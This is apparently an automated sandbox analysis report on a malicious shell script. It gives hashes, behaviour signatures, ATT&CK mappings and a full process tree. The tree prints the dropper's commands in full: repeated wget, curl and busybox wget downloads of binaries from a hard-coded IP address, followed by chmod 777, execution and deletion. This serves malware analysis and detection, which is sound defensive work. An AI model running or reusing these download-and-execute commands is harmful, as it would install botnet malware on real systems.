f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109

Analysis

max time kernel
13s
max time network
14s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
21-11-2024 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
Size

10KB
MD5

5c002a675bf13d9254cbcf71d0880ad7
SHA1

6b23ac737bbb2a21a5e8e322b7a85ce0bd035c04
SHA256

f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109
SHA512

66f9f99ad03a2a5b56bb54c3676f86d33a5d7e165bf9d7c1e43da38c2005258128fcf95746bc924ca55f6dae423b1f7762bce982455e40fc33534ac37d545a7f
SSDEEP

192:mLvHEMP7PbcMUXRRJOC1WKbD+DyDxe+qfr97COC7xN7877P3XS7eSsaTXkfrFOCY:gEamxe+OOzgvSonamxe+0SO

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

718 chmod
704 chmod
748 chmod
674 chmod
820 chmod
832 chmod
781 chmod
691 chmod
732 chmod
767 chmod
796 chmod
811 chmod
826 chmod
685 chmod

pid	process
718	chmod
704	chmod
748	chmod
674	chmod
820	chmod
832	chmod
781	chmod
691	chmod
732	chmod
767	chmod
796	chmod
811	chmod
826	chmod
685	chmod

Executes dropped EXE 14 IoCs

Processes:

9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfOyG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3JCzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpVuWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HFIilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQqTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6lCMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBBrTVygq67bdKN5FrIylBdjC3WphUPQ5jBgAyQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYtEdto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoIe0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuGGjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdpV8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M

ioc	pid	process
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	676	9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	686	yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	692	CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	705	uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	720	IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	733	jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	749	qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	769	CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	783	rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	797	yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	813	Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	821	e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	827	GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	833	V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M

Checks CPU configuration 1 TTPs 14 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	curl
File opened for modification	/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	curl
File opened for modification	/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	curl
File opened for modification	/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	curl
File opened for modification	/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	curl
File opened for modification	/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	curl
File opened for modification	/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	curl
File opened for modification	/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	curl
File opened for modification	/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	curl
File opened for modification	/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	curl
File opened for modification	/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	curl
File opened for modification	/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	curl
File opened for modification	/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	curl
File opened for modification	/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	curl

/tmp/f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
/tmp/f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
1⤵
PID:646
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:648
- /usr/bin/wget
  wget http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:653
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:661
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:672
- /bin/chmod
  chmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - File and Directory Permissions Modification
  PID:674
- /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  ./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Executes dropped EXE
  PID:676
- /bin/rm
  rm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:677
- /usr/bin/wget
  wget http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:679
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:682
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:684
- /bin/chmod
  chmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - File and Directory Permissions Modification
  PID:685
- /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  ./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Executes dropped EXE
  PID:686
- /bin/rm
  rm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:687
- /usr/bin/wget
  wget http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:688
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:689
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:690
- /bin/chmod
  chmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - File and Directory Permissions Modification
  PID:691
- /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  ./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Executes dropped EXE
  PID:692
- /bin/rm
  rm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:693
- /usr/bin/wget
  wget http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:694
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:697
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:701
- /bin/chmod
  chmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  ./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Executes dropped EXE
  PID:705
- /bin/rm
  rm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:706
- /usr/bin/wget
  wget http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:708
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:711
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:716
- /bin/chmod
  chmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - File and Directory Permissions Modification
  PID:718
- /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  ./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Executes dropped EXE
  PID:720
- /bin/rm
  rm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:721
- /usr/bin/wget
  wget http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:722
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:725
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:729
- /bin/chmod
  chmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Executes dropped EXE
  PID:733
- /bin/rm
  rm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:735
- /usr/bin/wget
  wget http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:737
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:745
- /bin/chmod
  chmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - File and Directory Permissions Modification
  PID:748
- /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  ./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Executes dropped EXE
  PID:749
- /bin/rm
  rm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:751
- /usr/bin/wget
  wget http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:752
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:764
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:765
- /bin/chmod
  chmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  ./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Executes dropped EXE
  PID:769
- /bin/rm
  rm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:770
- /usr/bin/wget
  wget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:771
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:774
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:778
- /bin/chmod
  chmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  ./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Executes dropped EXE
  PID:783
- /bin/rm
  rm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:784
- /usr/bin/wget
  wget http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:785
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:789
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:793
- /bin/chmod
  chmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  ./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Executes dropped EXE
  PID:797
- /bin/rm
  rm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:798
- /usr/bin/wget
  wget http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:800
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:803
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:809
- /bin/chmod
  chmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  ./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Executes dropped EXE
  PID:813
- /bin/rm
  rm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:814
- /usr/bin/wget
  wget http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:815
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:818
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:819
- /bin/chmod
  chmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  ./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Executes dropped EXE
  PID:821
- /bin/rm
  rm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:822
- /usr/bin/wget
  wget http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:823
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:824
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:825
- /bin/chmod
  chmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  ./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Executes dropped EXE
  PID:827
- /bin/rm
  rm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:828
- /usr/bin/wget
  wget http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:829
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:830
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:831
- /bin/chmod
  chmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - File and Directory Permissions Modification
  PID:832
- /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  ./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Executes dropped EXE
  PID:833
- /bin/rm
  rm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:834
- /usr/bin/wget
  wget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:835

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/737-1-0xb6748000-0xb6759044-memory.dmp

Download